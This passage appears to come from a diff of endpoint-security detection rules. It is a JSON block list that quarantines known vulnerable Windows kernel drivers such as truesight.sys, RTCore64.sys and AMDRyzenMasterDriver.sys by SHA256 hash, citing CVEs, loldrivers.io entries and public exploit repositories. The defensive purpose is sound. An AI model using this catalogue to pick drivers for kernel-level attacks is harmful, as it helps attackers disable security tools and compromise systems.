+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143723Z",
+ "creation_date": "2026-03-23T11:45:32.143726Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b14ff6a1054fa4bae158111fbcaf35baeedaa9b664c8fb7241db98f7e1c6c20",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c16788d-a162-52a0-967e-f4f6e6f7770d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495585Z",
+ "creation_date": "2026-03-23T11:45:31.495587Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53cd5eeac12e5850c978570f42faa93731d6519da4fa747cc57c37d442ec8142",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c1eec8e-982a-5448-8752-995c2ff0a745",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481711Z",
+ "creation_date": "2026-03-23T11:45:31.481714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e3d9ac8a8067d049d19c798dc419def9ad47db592ba515e7134664985c4b79f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c36dadb-a3ba-5ab6-9522-884c12d0eb1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607381Z",
+ "creation_date": "2026-03-23T11:45:29.607383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f84f8173242b95f9f3c4fea99b5555b33f9ce37ca8188b643871d261cb081496",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c394935-7469-501a-9833-f4f84e0caa7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831495Z",
+ "creation_date": "2026-03-23T11:45:30.831497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ec99853052f83b8f7279ac0283f9721f663fa44bc64baef21f94394c3a2c36a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c477103-9716-5585-81cd-ba975fccd12c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807992Z",
+ "creation_date": "2026-03-23T11:45:31.807995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19bdcbfbd05cc52a932a38e75aecd1240e3a4c74ef40fdd86a87f8bb9a96db36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c5c6e8d-0f9f-52e0-8177-602f84e62918",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834491Z",
+ "creation_date": "2026-03-23T11:45:30.834494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2274479c525939a531525c393bac08042babe6c8792cdcde8e6952bdab4dd3d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c5f2fc6-d6ac-59ec-9c76-1fa23ac53fa1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981589Z",
+ "creation_date": "2026-03-23T11:45:29.981591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981596Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c",
+ "comment": "Vulnerable Kernel Driver (aka gametersafe.sys) [https://www.loldrivers.io/drivers/1ab1ec8c-1231-4ba4-8804-4a2cda103bb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c6095eb-ab5a-50e5-a7a2-176220bbcd5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498228Z",
+ "creation_date": "2026-03-23T11:45:31.498231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b1feec688a8484df79de6dc686031e9820d88433efc21596a70fee47c85230f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c60c519-fa3e-55c9-85a6-c11b0ae59899",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141903Z",
+ "creation_date": "2026-03-23T11:45:31.141905Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141910Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f73d9daffb0addc47f3a8ce6fa9eb189c648fc52e6cc8dca02aa10131c24179",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c67730d-ca67-5727-93a6-8f7fc7ead43b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485611Z",
+ "creation_date": "2026-03-23T11:45:31.485615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485625Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cb73ae30e9c53f30c40bc6305623f4cdde8c4ff5451f2b18a45314f9d9eb3d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c6b1302-434d-57ad-b03a-dc978474cc61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141451Z",
+ "creation_date": "2026-03-23T11:45:31.141453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90227d20f02ebe9db8024aaf87e46af68af47a8e70ab11fd20bc6e613820c425",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c6c6697-a418-5b25-bd37-b78cb1f7d239",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610176Z",
+ "creation_date": "2026-03-23T11:45:29.610178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610184Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "771015b2620942919bb2e0683476635b7a09db55216d6fbf03534cb18513b20c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c7462e8-3573-5a9c-884c-f0a8ef17cdd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490208Z",
+ "creation_date": "2026-03-23T11:45:31.490210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1f2355dfd0dc06227cbc38148096e640bc9141fc9a1ceb3923e782b66a3e861",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c799527-c45e-5e28-b9be-e122e6b3145f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149203Z",
+ "creation_date": "2026-03-23T11:45:31.149205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c64d5088568ff05e8e16deaaa8ad5de85bc97b17ceda89d5c12ecadeade6244",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c7baf9d-0ba9-519d-9028-834f4dcb7220",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975113Z",
+ "creation_date": "2026-03-23T11:45:29.975115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "909de5f21837ea2b13fdc4e5763589e6bdedb903f7c04e1d0b08776639774880",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c7fd195-ed33-57e8-a711-1ee1bcc7b7b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143669Z",
+ "creation_date": "2026-03-23T11:45:32.143671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fcffb9cecbcefc399a2a08d99fcc2b797911afa26f3d69a28a139311cb61c39a",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c8da4cd-50fa-53b5-aa66-7d15a0c7313e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974367Z",
+ "creation_date": "2026-03-23T11:45:29.974369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974374Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c032e2abdf4f07ba42ce4559e6413387becbebb0a43c287b6d367dbb33bde751",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c8ef4f6-7d9b-5423-9703-79367a82d081",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500442Z",
+ "creation_date": "2026-03-23T11:45:31.500445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d63a68a6e08f1a9ba6e2053de4e4c35c79bba2809d1ec92318d1e3d1a8b8934b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c9d00eb-05e7-5e4b-9cba-d208d691443a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452310Z",
+ "creation_date": "2026-03-23T11:45:30.452313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452323Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7b3112b9745b766c8359d25e315975d3159935a8ddb3e3035d21ed124a9013f",
+ "comment": "Vulnerable Kernel Driver (aka phydmaccx64.sys) [https://www.loldrivers.io/drivers/96c8fe71-3acc-41bc-9402-ebd69a961d74/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5c9e0b56-e26c-5008-aca4-1760ba4b334c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143770Z",
+ "creation_date": "2026-03-23T11:45:31.143772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04bf4f16cd0fefd8456f77f4f4b64502b570f8b685df3de419faae2389b58f5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5cae8a67-2780-5f1c-93aa-77cf882f0149",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476565Z",
+ "creation_date": "2026-03-23T11:45:31.476569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476579Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7089503cc4f499b84ccec39aacbeec7bf0bdbe920b7b9e02b4122ab8efcb5add",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5caebab0-c790-5fbe-9483-2548fc515dd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
